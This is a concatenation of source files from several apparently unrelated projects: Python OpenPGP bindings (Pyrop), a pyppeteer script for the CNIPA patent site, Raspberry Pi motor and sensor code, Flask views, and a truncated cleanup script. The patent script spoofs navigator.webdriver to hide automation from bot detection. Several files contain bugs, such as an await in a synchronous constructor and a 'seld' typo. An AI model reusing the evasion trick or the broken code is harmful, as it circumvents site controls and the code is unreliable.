self.clear_usage()
for usage in usages:
self.add_usage(usage)
def set_userid(self, userid):
_call_rop_func(self.__lib.rnp_op_generate_set_userid, 0, self.__opid, userid)
def set_expiration(self, expiration):
_call_rop_func(self.__lib.rnp_op_generate_set_expiration, 0, self.__opid, \
_timedelta2sec(expiration))
def add_pref_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_hash, 0, self.__opid, hash_)
def clear_pref_hashes(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_hashes, 0, self.__opid)
def set_pref_hashes(self, hashes):
self.clear_pref_hashes()
for hash_ in hashes:
self.add_pref_hash(hash_)
def add_pref_compression(self, compression):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_compression, 0, self.__opid, compression)
def clear_pref_compression(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_compression, 0, self.__opid)
def set_pref_compressions(self, compressions):
self.clear_pref_compression()
for compression in compressions:
self.add_pref_compression(compression)
def add_pref_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_generate_add_pref_cipher, 0, self.__opid, cipher)
def clear_pref_ciphers(self):
_call_rop_func(self.__lib.rnp_op_generate_clear_pref_ciphers, 0, self.__opid)
def set_pref_ciphers(self, ciphers):
self.clear_pref_ciphers()
for cipher in ciphers:
self.add_pref_cipher(cipher)
def set_pref_keyserver(self, keyserver):
_call_rop_func(self.__lib.rnp_op_generate_set_pref_keyserver, 0, self.__opid, keyserver)
def execute(self):
_call_rop_func(self.__lib.rnp_op_generate_execute, 0, self.__opid)
def get_key(self, tag=0):
handle = _call_rop_func(self.__lib.rnp_op_generate_get_key, 1, self.__opid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, handle, RopKey, tag)
class RopOpEncrypt(object):
'''OP Encrypt proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_encrypt_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
def add_recipient(self, key):
hkey = (key.handle if key is not None else None)
_call_rop_func(self.__lib.rnp_op_encrypt_add_recipient, 0, self.__opid, hkey)
def add_signature(self, key):
hkey = (key.handle if key is not None else None)
hop = _call_rop_func(self.__lib.rnp_op_encrypt_add_signature, 1, self.__opid, hkey)
return RopSignSignature(self.__own(), hop)
def set_hash(self, hash_):
_call_rop_func(self.__lib.rnp_op_encrypt_set_hash, 0, self.__opid, hash_)
def set_creation_time(self, create):
_call_rop_func(self.__lib.rnp_op_encrypt_set_creation_time, 0, self.__opid, \
_datetime2ts(create))
def set_expiration_time(self, expire):
_call_rop_func(self.__lib.rnp_op_encrypt_set_expiration_time, 0, self.__opid, \
_datetime2ts(expire))
def add_password(self, password, s2k_hash, iterations, s2k_cipher):
_call_rop_func(self.__lib.rnp_op_encrypt_add_password, 0, self.__opid, password, \
s2k_hash, iterations, s2k_cipher)
def set_armor(self, armored):
_call_rop_func(self.__lib.rnp_op_encrypt_set_armor, 0, self.__opid, armored)
def set_cipher(self, cipher):
_call_rop_func(self.__lib.rnp_op_encrypt_set_cipher, 0, self.__opid, cipher)
def set_aead(self, alg):
_call_rop_func(self.__lib.rnp_op_encrypt_set_aead, 0, self.__opid, alg)
def set_aead_bits(self, bits):
_call_rop_func(self.__lib.rnp_op_encrypt_set_aead_bits, 0, self.__opid, bits)
def set_compression(self, compression, level):
_call_rop_func(self.__lib.rnp_op_encrypt_set_compression, 0, self.__opid, \
compression, level)
def set_file_name(self, filename):
_call_rop_func(self.__lib.rnp_op_encrypt_set_file_name, 0, self.__opid, filename)
def set_file_mtime(self, mtime):
_call_rop_func(self.__lib.rnp_op_encrypt_set_file_mtime, 0, self.__opid, \
_datetime2ts(mtime))
def execute(self):
_call_rop_func(self.__lib.rnp_op_encrypt_execute, 0, self.__opid)
class RopVeriSignature(object):
'''OP Verify Signature proxy
'''
def __init__(self, own, sgid):
self.__own = weakref(own)
self.__lib = own.lib
if sgid is None or sgid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__sgid = sgid
@property
def handle(self): return self.__sgid
# API
@property
def hash(self):
hash_ = _call_rop_func(self.__lib.rnp_op_verify_signature_get_hash, 1, self.__sgid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, hash_)
@property
def status(self):
return self.__lib.rnp_op_verify_signature_get_status(self.__sgid)
def get_handle(self, tag=0):
handle = _call_rop_func(self.__lib.rnp_op_verify_signature_get_handle, 1, self.__sgid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, handle, RopSign, tag)
def get_key(self, tag=0):
hkey = _call_rop_func(self.__lib.rnp_op_verify_signature_get_key, 1, self.__sgid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, hkey, RopKey, tag)
def get_times(self):
tm1, tm2 = _call_rop_func(self.__lib.rnp_op_verify_signature_get_times, 2, self.__sgid)
return _ts2datetime(tm1), _ts2datetime(tm2)
class RopRecipient(object):
'''OP Recipient
'''
def __init__(self, own, rid):
self.__own = weakref(own)
self.__lib = own.lib
if rid is None or rid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__rid = rid
@property
def handle(self): return self.__rid
# API
@property
def keyid(self):
kid = _call_rop_func(self.__lib.rnp_recipient_get_keyid, 1, self.__rid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, kid)
@property
def alg(self):
alg = _call_rop_func(self.__lib.rnp_recipient_get_alg, 1, self.__rid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
class RopSymEnc(object):
'''OP Symenc
'''
def __init__(self, own, seid):
self.__own = weakref(own)
self.__lib = own.lib
if seid is None or seid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__seid = seid
@property
def handle(self): return self.__seid
# API
@property
def cipher(self):
cip = _call_rop_func(self.__lib.rnp_symenc_get_cipher, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, cip)
@property
def aead_alg(self):
alg = _call_rop_func(self.__lib.rnp_symenc_get_aead_alg, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
@property
def hash_alg(self):
alg = _call_rop_func(self.__lib.rnp_symenc_get_hash_alg, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, alg)
@property
def s2k_type(self):
s2k = _call_rop_func(self.__lib.rnp_symenc_get_s2k_type, 1, self.__seid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, s2k)
@property
def s2k_iterations(self):
return _call_rop_func(self.__lib.rnp_symenc_get_s2k_iterations, 1, self.__seid)
class RopOpVerify(object):
'''OP Verify proxy
'''
def __init__(self, own, opid):
self.__own = weakref(own)
self.__lib = own.lib
if opid is None or opid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__opid = opid
def _close(self):
ret = self.__lib.rnp_op_verify_destroy(self.__opid)
self.__opid = None
return ret
@property
def handle(self): return self.__opid
# API
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_signature_count, 1, self.__opid)
def execute(self):
_call_rop_func(self.__lib.rnp_op_verify_execute, 0, self.__opid)
def get_signature_at(self, idx):
sig = _call_rop_func(self.__lib.rnp_op_verify_get_signature_at, 1, self.__opid, idx)
return RopVeriSignature(self.__own(), sig)
def get_file_info(self):
filename, mtime = _call_rop_func(self.__lib.rnp_op_verify_get_file_info, 2, self.__opid)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, filename), _ts2datetime(mtime)
def get_protection_info(self):
# F() -> (mode: str, cipher: str, valid: bool)
mode, cipher, valid = _call_rop_func(self.__lib.rnp_op_verify_get_protection_info, 3, self.__opid)
cipher = _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, cipher)
return _get_rop_string(self.__lib, ROPE.RNP_SUCCESS, mode), cipher, valid
@property
def recipient_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_recipient_count, 1, self.__opid)
@property
def used_recipient(self):
rcp = _call_rop_func(self.__lib.rnp_op_verify_get_used_recipient, 1, self.__opid)
return RopRecipient(self.__own(), rcp) if rcp.value is not None else None
def get_recipient_at(self, idx):
rcp = _call_rop_func(self.__lib.rnp_op_verify_get_recipient_at, 1, self.__opid, idx)
return RopRecipient(self.__own(), rcp) if rcp.value is not None else None
@property
def symenc_count(self):
return _call_rop_func(self.__lib.rnp_op_verify_get_symenc_count, 1, self.__opid)
@property
def used_symenc(self):
senc = _call_rop_func(self.__lib.rnp_op_verify_get_used_symenc, 1, self.__opid)
return RopSymEnc(self.__own(), senc) if senc.value is not None else None
def get_symenc_at(self, idx):
senc = _call_rop_func(self.__lib.rnp_op_verify_get_symenc_at, 1, self.__opid, idx)
return RopSymEnc(self.__own(), senc) if senc.value is not None else None
``` |
{
"source": "joke325/Pyrop",
"score": 2
} |
#### File: Pyrop/examples/decrypt.py
```python
from pyrop.bind import RopBind
from pyrop.error import RopError
message = "Dummy"
def example_pass_provider(session, app_ctx, key, pgp_context, buf_len):
if pgp_context == 'decrypt (symmetric)':
return True, 'encpassword'
if pgp_context == 'decrypt':
return True, 'password'
return False, None
def decrypt(rop, usekeys):
alt = rop.tagging()
try:
# initialize FFI object
ses = rop.create_session(rop.KEYSTORE_GPG, rop.KEYSTORE_GPG)
# check whether we want to use key or password for decryption
if usekeys:
try:
# load secret keyring, as it is required for public-key decryption. However, you may
# need to load public keyring as well to validate key's signatures.
keyfile = rop.create_input(path="secring.pgp")
# we may use secret=True and public=True as well
ses.load_keys(rop.KEYSTORE_GPG, keyfile, secret=True)
except RopError:
print("Failed to read secring")
raise
finally:
rop.drop(object_=keyfile)
# set the password provider
ses.set_pass_provider(example_pass_provider, None)
try:
# create file input and memory output objects for the encrypted message and decrypted
# message
input_ = rop.create_input(path="encrypted.asc")
output = rop.create_output(max_alloc=0)
ses.decrypt(input_, output)
# get the decrypted message from the output structure
buf = output.memory_get_str(False)
except RopError:
print("Public-key decryption failed")
raise
print("Decrypted message ({}):\n{}\n".format("with key" if usekeys else \
"with password", buf))
global message
message = buf
finally:
rop.drop(from_=alt)
def execute():
rop = RopBind()
try:
decrypt(rop, True)
decrypt(rop, False)
finally:
rop.close()
if __name__ == '__main__':
execute()
```
#### File: Pyrop/pyrop/key.py
```python
__version__ = "0.14.0"
# Copyright (c) 2020 Janky <<EMAIL>>
# All right reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
from weakref import ref as weakref
from datetime import datetime, timedelta
from .rop.lib import ROPD
from .rop.err import ROPE
from .error import RopError
from .util import _get_rop_data, _call_rop_func, _new_rop_obj, _get_str_prop, _ts2datetime, \
_timedelta2sec
class RopUidHandle(object):
'''UID proxy
'''
def __init__(self, own, huid):
self.__own = weakref(own)
self.__lib = own.lib
if huid is None or huid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__huid = huid
def _close(self):
ret = self.__lib.rnp_uid_handle_destroy(self.__huid)
self.__huid = None
return ret
@property
def handle(self): return self.__huid
# API
def get_type(self):
return _call_rop_func(self.__lib.rnp_uid_get_type, 1, self.__huid)
def get_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_uid_get_data, 2, self.__huid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
@property
def is_primary(self):
return _call_rop_func(self.__lib.rnp_uid_is_primary, 1, self.__huid)
@property
def is_valid(self):
return _call_rop_func(self.__lib.rnp_uid_is_valid, 1, self.__huid)
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_uid_get_signature_count, 1, self.__huid)
@property
def is_revoked(self):
return _call_rop_func(self.__lib.rnp_uid_is_revoked, 1, self.__huid)
def get_signature_at(self, idx, tag=0):
sign = _call_rop_func(self.__lib.rnp_uid_get_signature_at, 1, self.__huid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def get_revocation_signature(self, tag=0):
sign = _call_rop_func(self.__lib.rnp_uid_get_revocation_signature, 1, self.__huid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
class RopKey(object):
'''Key proxy
'''
def __init__(self, own, kid):
self.__own = weakref(own)
self.__lib = own.lib
if kid is None or kid.value is None:
raise RopError(self.__own().ROP_ERROR_NULL_HANDLE)
self.__kid = kid
def _close(self):
ret = ROPE.RNP_SUCCESS
if self.__kid is not None:
ret = self.__lib.rnp_key_handle_destroy(self.__kid)
self.__kid = None
return ret
def _detach(self):
self.__kid = None
@property
def handle(self): return self.__kid
# API
@property
def keyid(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_keyid, self.__kid)
@property
def alg(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_alg, self.__kid)
@property
def primary_grip(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_grip, self.__kid)
@property
def primary_fprint(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_fprint, self.__kid)
@property
def fprint(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_fprint, self.__kid)
@property
def grip(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_grip, self.__kid)
@property
def primary_uid(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_primary_uid, self.__kid)
@property
def curve(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_curve, self.__kid)
@property
def revocation_reason(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_revocation_reason, self.__kid)
def set_expiration(self, expiry):
_call_rop_func(self.__lib.rnp_key_set_expiration, 0, self.__kid, _timedelta2sec(expiry));
@property
def is_valid(self):
return _call_rop_func(self.__lib.rnp_key_is_valid, 1, self.__kid)
@property
def valid_till(self):
tms = _call_rop_func(self.__lib.rnp_key_valid_till, 1, self.__kid)
dtime = _ts2datetime(tms)
if tms == 0:
dtime = datetime.min;
elif tms == 0xffffffff:
dtime = datetime.max;
return dtime
@property
def is_revoked(self):
return _call_rop_func(self.__lib.rnp_key_is_revoked, 1, self.__kid)
@property
def is_superseded(self):
return _call_rop_func(self.__lib.rnp_key_is_superseded, 1, self.__kid)
@property
def is_compromised(self):
return _call_rop_func(self.__lib.rnp_key_is_compromised, 1, self.__kid)
@property
def is_retired(self):
return _call_rop_func(self.__lib.rnp_key_is_retired, 1, self.__kid)
@property
def is_locked(self):
return _call_rop_func(self.__lib.rnp_key_is_locked, 1, self.__kid)
@property
def protection_type(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_type, self.__kid)
@property
def protection_mode(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_mode, self.__kid)
@property
def protection_cipher(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_cipher, self.__kid)
@property
def protection_hash(self):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_protection_hash, self.__kid)
@property
def protection_iterations(self):
return _call_rop_func(self.__lib.rnp_key_get_protection_iterations, 1, self.__kid)
@property
def is_protected(self):
return _call_rop_func(self.__lib.rnp_key_is_protected, 1, self.__kid)
@property
def is_primary(self):
return _call_rop_func(self.__lib.rnp_key_is_primary, 1, self.__kid)
@property
def is_sub(self):
return _call_rop_func(self.__lib.rnp_key_is_sub, 1, self.__kid)
@property
def have_secret(self):
return _call_rop_func(self.__lib.rnp_key_have_secret, 1, self.__kid)
@property
def have_public(self):
return _call_rop_func(self.__lib.rnp_key_have_public, 1, self.__kid)
@property
def creation(self):
tms = _call_rop_func(self.__lib.rnp_key_get_creation, 1, self.__kid)
return _ts2datetime(tms)
@property
def expiration(self):
return timedelta(seconds=_call_rop_func(self.__lib.rnp_key_get_expiration, 1, self.__kid))
@property
def uid_count(self):
return _call_rop_func(self.__lib.rnp_key_get_uid_count, 1, self.__kid)
@property
def signature_count(self):
return _call_rop_func(self.__lib.rnp_key_get_signature_count, 1, self.__kid)
@property
def bits(self):
return _call_rop_func(self.__lib.rnp_key_get_bits, 1, self.__kid)
@property
def dsa_qbits(self):
return _call_rop_func(self.__lib.rnp_key_get_dsa_qbits, 1, self.__kid)
@property
def subkey_count(self):
return _call_rop_func(self.__lib.rnp_key_get_subkey_count, 1, self.__kid)
def get_uid_at(self, idx):
return _get_str_prop(self.__lib, self.__lib.rnp_key_get_uid_at, self.__kid, idx)
def to_json(self, public_mpis=False, secret_mpis=False, signatures=False, sign_mpis=False):
flags = (ROPD.RNP_JSON_PUBLIC_MPIS if public_mpis else 0)
flags |= (ROPD.RNP_JSON_SECRET_MPIS if secret_mpis else 0)
flags |= (ROPD.RNP_JSON_SIGNATURES if signatures else 0)
flags |= (ROPD.RNP_JSON_SIGNATURE_MPIS if sign_mpis else 0)
return _get_str_prop(self.__lib, self.__lib.rnp_key_to_json, self.__kid, flags)
def packets_to_json(self, secret, mpi=False, raw=False, grip=False):
flags = (ROPD.RNP_JSON_DUMP_MPI if mpi else 0)
flags |= (ROPD.RNP_JSON_DUMP_RAW if raw else 0)
flags |= (ROPD.RNP_JSON_DUMP_GRIP if grip else 0)
return _get_str_prop(self.__lib, self.__lib.rnp_key_packets_to_json, self.__kid, \
secret, flags)
def allows_usage(self, usage):
return _call_rop_func(self.__lib.rnp_key_allows_usage, 1, self.__kid, usage)
def allows_usages(self, usages):
for usage in usages:
if not self.allows_usage(usage):
return False
return True
def disallows_usages(self, usages):
for usage in usages:
if self.allows_usage(usage):
return False
return True
def lock(self):
_call_rop_func(self.__lib.rnp_key_lock, 0, self.__kid)
def unlock(self, password):
_call_rop_func(self.__lib.rnp_key_unlock, 0, self.__kid, password)
def get_uid_handle_at(self, idx, tag=0):
huid = _call_rop_func(self.__lib.rnp_key_get_uid_handle_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, huid, RopUidHandle, tag)
def protect(self, password, cipher, cipher_mode, hash_, iterations):
_call_rop_func(self.__lib.rnp_key_protect, 0, self.__kid, password, cipher, \
cipher_mode, hash_, iterations)
def unprotect(self, password):
_call_rop_func(self.__lib.rnp_key_unprotect, 0, self.__kid, password)
def public_key_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_get_public_key_data, 2, self.__kid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
def secret_key_data(self):
data, dlen = _call_rop_func(self.__lib.rnp_get_secret_key_data, 2, self.__kid)
return _get_rop_data(self.__lib, ROPE.RNP_SUCCESS, data, dlen)
def add_uid(self, uid, hash_, expiration, key_flags, primary):
_call_rop_func(self.__lib.rnp_key_add_uid, 0, self.__kid, uid, hash_, expiration, \
key_flags, primary)
def get_subkey_at(self, idx, tag=0):
skey = _call_rop_func(self.__lib.rnp_key_get_subkey_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, skey, RopKey, tag)
def get_signature_at(self, idx, tag=0):
sign = _call_rop_func(self.__lib.rnp_key_get_signature_at, 1, self.__kid, idx)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def get_revocation_signature(self, tag=0):
sign = _call_rop_func(self.__lib.rnp_key_get_revocation_signature, 1, self.__kid)
return _new_rop_obj(self.__own(), ROPE.RNP_SUCCESS, sign, RopSign, tag)
def export(self, output, public=True, secret=True, subkey=False, armored=False):
outp = (output.handle if output is not None else None)
flags = (ROPD.RNP_KEY_EXPORT_PUBLIC if public else 0)
flags |= (ROPD.RNP_KEY_EXPORT_SECRET if secret else 0)
flags |= (ROPD.RNP_KEY_EXPORT_SUBKEYS if subkey else 0)
flags |= (ROPD.RNP_KEY_EXPORT_ARMORED if armored else 0)
_call_rop_func(self.__lib.rnp_key_export, 0, self.__kid, outp, flags)
def export_public(self, output, **kwargs):
self.export(output, public=True, secret=False, **kwargs)
def export_secret(self, output, **kwargs):
self.export(output, public=False, secret=True, **kwargs)
def export_autocrypt(self, subkey, uid, output):
subk = (subkey.handle if subkey is not None else None)
outp = (output.handle if output is not None else None)
_call_rop_func(self.__lib.rnp_key_export_autocrypt, 0, self.__kid, subk, uid, outp, 0)
def remove(self, public=True, secret=True, subkeys=False):
flags = (ROPD.RNP_KEY_REMOVE_PUBLIC if public else 0)
flags |= (ROPD.RNP_KEY_REMOVE_SECRET if secret else 0)
flags |= (ROPD.RNP_KEY_REMOVE_SUBKEYS if subkeys else 0)
_call_rop_func(self.__lib.rnp_key_remove, 0, self.__kid, flags)
def remove_public(self, subkeys=False):
self.remove(True, False, subkeys)
def remove_secret(self, subkeys=False):
self.remove(False, True, subkeys)
def export_revocation(self, output, hash_, code, reason):
outp = (output.handle if output is not None else None)
_call_rop_func(self.__lib.rnp_key_export_revocation, 0, self.__kid, outp, 0, hash_, code, reason)
def revoke(self, hash_, code, reason):
_call_rop_func(self.__lib.rnp_key_revoke, 0, self.__kid, 0, hash_, code, reason)
from .sign import RopSign
``` |
{
"source": "jokeaa/CNIPA-Patent-Acquiring",
"score": 3
} |
#### File: jokeaa/CNIPA-Patent-Acquiring/patent_script.py
```python
import asyncio
from pyppeteer import launch
import tkinter
import Sensitive
class Patent():
def __init__(self):
tk = tkinter.Tk()
width = tk.winfo_screenwidth()
height = tk.winfo_screenheight()
tk.quit()
browser = await launch(headless=False,
args=[f'--window-size={width},{height}'],
ignoreDefaultArgs="enable-automation")
self.page = await browser.newPage()
await self.page.setViewport(viewport={'width': width, 'height': height})
async def login(self):
await self.page.goto('http://cpquery.cnipa.gov.cn/')
await self.page.evaluate(
'''() =>{ Object.defineProperties(navigator,{ webdriver:{ get: () => false } }) }''')
# await page.evaluate('''() =>{ window.navigator.chrome = { runtime: {}, }; }''')
await self.page.waitForSelector("#publiclogin")
await asyncio.sleep(2)
username = await self.page.waitForSelector("#username1")
await username.type(Sensitive.account_text)
password = await self.page.waitForSelector("#password1")
await password.type(Sensitive.password_text)
wait = input("authentication-done:")
login = await self.page.waitForSelector("#publiclogin")
await login.click()
await asyncio.sleep(2)
agree = await self.page.waitForSelector("#agreeid")
await agree.click()
await asyncio.sleep(0.5)
go_btn = await self.page.waitForSelector("#goBtn")
await go_btn.click()
async def search(self, company=""):
if company == "":
company = "江苏民威电碳科技有限公司"
applicant = await self.page.waitForSelector('#select-key\:shenqingrxm')
await applicant.type(company)
async def run(self):
await self.login()
def main():
pt = Patent()
asyncio.get_event_loop().run_until_complete(pt.run())
asyncio.get_event_loop().run_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "jokedurnez/Flora",
"score": 2
} |
#### File: app/flora/metrics.py
```python
from .utils.Adafruit_I2C import Adafruit_I2C
class Adafruit_ADXL345(Adafruit_I2C):
# Minimal constants carried over from Arduino library
ADXL345_ADDRESS = 0x53
ADXL345_REG_DEVID = 0x00 # Device ID
ADXL345_REG_DATAX0 = 0x32 # X-axis data 0 (6 bytes for X/Y/Z)
ADXL345_REG_POWER_CTL = 0x2D # Power-saving features control
ADXL345_DATARATE_0_10_HZ = 0x00
ADXL345_DATARATE_0_20_HZ = 0x01
ADXL345_DATARATE_0_39_HZ = 0x02
ADXL345_DATARATE_0_78_HZ = 0x03
ADXL345_DATARATE_1_56_HZ = 0x04
ADXL345_DATARATE_3_13_HZ = 0x05
ADXL345_DATARATE_6_25HZ = 0x06
ADXL345_DATARATE_12_5_HZ = 0x07
ADXL345_DATARATE_25_HZ = 0x08
ADXL345_DATARATE_50_HZ = 0x09
ADXL345_DATARATE_100_HZ = 0x0A # (default)
ADXL345_DATARATE_200_HZ = 0x0B
ADXL345_DATARATE_400_HZ = 0x0C
ADXL345_DATARATE_800_HZ = 0x0D
ADXL345_DATARATE_1600_HZ = 0x0E
ADXL345_DATARATE_3200_HZ = 0x0F
ADXL345_RANGE_2_G = 0x00 # +/- 2g (default)
ADXL345_RANGE_4_G = 0x01 # +/- 4g
ADXL345_RANGE_8_G = 0x02 # +/- 8g
ADXL345_RANGE_16_G = 0x03 # +/- 16g
def __init__(self, busnum=-1, debug=False):
self.accel = Adafruit_I2C(self.ADXL345_ADDRESS, busnum, debug)
if self.accel.readU8(self.ADXL345_REG_DEVID) == 0xE5:
# Enable the accelerometer
self.accel.write8(self.ADXL345_REG_POWER_CTL, 0x08)
def setRange(self, range):
# Read the data format register to preserve bits. Update the data
# rate, make sure that the FULL-RES bit is enabled for range scaling
format = ((self.accel.readU8(self.ADXL345_REG_DATA_FORMAT) & ~0x0F) |
range | 0x08)
# Write the register back to the IC
seld.accel.write8(self.ADXL345_REG_DATA_FORMAT, format)
def getRange(self):
return self.accel.readU8(self.ADXL345_REG_DATA_FORMAT) & 0x03
def setDataRate(self, dataRate):
# Note: The LOW_POWER bits are currently ignored,
# we always keep the device in 'normal' mode
self.accel.write8(self.ADXL345_REG_BW_RATE, dataRate & 0x0F)
def getDataRate(self):
return self.accel.readU8(self.ADXL345_REG_BW_RATE) & 0x0F
# Read the accelerometer
def read(self):
raw = self.accel.readList(self.ADXL345_REG_DATAX0, 6)
res = []
for i in range(0, 6, 2):
g = raw[i] | (raw[i+1] << 8)
if g > 32767: g -= 65536
res.append(g)
return res
```
#### File: app/flora/motor.py
```python
import RPi.GPIO as GPIO
import time
pins = {
"drive": {
2: 12,
1: 16,
"c": 18
},
"direction": {
1: 19,
2: 21,
"c": 23
}
}
allpins = [v for key,side in pins.items() for k,v in side.items()]
controlpins = [v for key,side in pins.items() for k,v in side.items() if k=='c']
def backward():
GPIO.output(pins['drive']['c'], GPIO.HIGH)
GPIO.output(pins['drive'][1], GPIO.HIGH)
GPIO.output(pins['drive'][2], GPIO.LOW)
def forward():
GPIO.output(pins['drive']['c'], GPIO.HIGH)
GPIO.output(pins['drive'][1], GPIO.LOW)
GPIO.output(pins['drive'][2], GPIO.HIGH)
def stop():
GPIO.output(pins['drive']['c'], GPIO.LOW)
def turn(direction, scale=1, freq=1, dc=50, dur=0.05):
dir1 = 1 if direction == "left" else 2
dir2 = 2 if direction == "left" else 1
GPIO.output(pins['direction'][dir1], GPIO.LOW)
GPIO.output(pins['direction'][dir2], GPIO.HIGH)
p = GPIO.PWM(pins['direction']['c'], freq)
p.start(dc)
time.sleep(dur*scale)
p.stop()
GPIO.output(pins['direction']['c'], GPIO.LOW)
GPIO.output(pins['direction'][dir1], GPIO.LOW)
GPIO.output(pins['direction'][dir2], GPIO.LOW)
def stop_rotation():
GPIO.output(pins['direction']['c'], GPIO.LOW)
def action(action, **kwargs):
if action == "left":
turn("left",**kwargs)
if action == "right":
turn("right",**kwargs)
if action == "forward":
forward()
if action == "backward":
backward()
if action == "stop":
stop()
def setup():
GPIO.setmode(GPIO.BOARD)
for pin in allpins:
GPIO.setup(pin, GPIO.OUT)
for controlpin in controlpins:
GPIO.output(controlpin, GPIO.LOW)
def loop():
while True:
print ('Press Ctrl+C to end the program...')
turn("left")
backward()
time.sleep(2)
stop()
time.sleep(0.2)
turn("right")
forward()
time.sleep(2)
stop()
time.sleep(0.2)
def destroy():
stop()
GPIO.cleanup() # Release resource
```
#### File: Flora/app/views.py
```python
from flask import Flask, jsonify, request, render_template, redirect, Response, Blueprint
views = Blueprint('views', __name__, url_prefix='', template_folder='templates')
@views.route('/home', methods = ['GET'])
def home():
return render_template("home.html")
@views.route('/metrics', methods = ['GET'])
def metrics():
return render_template("metrics.html")
@views.route('/stream', methods = ['GET'])
def streamer():
return render_template('streamer.html')
@views.route('/recognise', methods = ['GET'])
def recogniser():
return render_template('recognizer.html')
``` |
{
"source": "jokedurnez/neuropowertools",
"score": 3
} |
#### File: power/utils/sessions.py
```python
def get_session_id(request):
'''get_session_id gets the user session id, and creates one if it doesn't exist'''
if not request.session.exists(request.session.session_key):
request.session.create()
sid = request.session.session_key
return(sid)
``` |
{
"source": "jokedurnez/Psychosis",
"score": 2
} |
#### File: Psychosis/misc/check_rests_preprocessed.py
```python
import os
import pandas as pd
import shutil
import numpy as np
bidsdir = os.environ.get("BIDSDIR")
prepdir = os.environ.get("PREPDIR")
condir = os.environ.get("CONDIR")
participants = pd.read_csv(os.path.join(os.environ.get("TABLEDIR"),'REDCAP_clean.csv'))
remove = False
def remove_con(idx,subject):
condir = os.environ.get("CONDIR")
codedir = os.environ.get("CODEDIR")
consub = os.path.join(condir,'sub-%s'%participant)
if os.path.exists(consub):
shutil.rmtree(consub)
print("removed %s"%consub)
for suffix in ['.err','.out']:
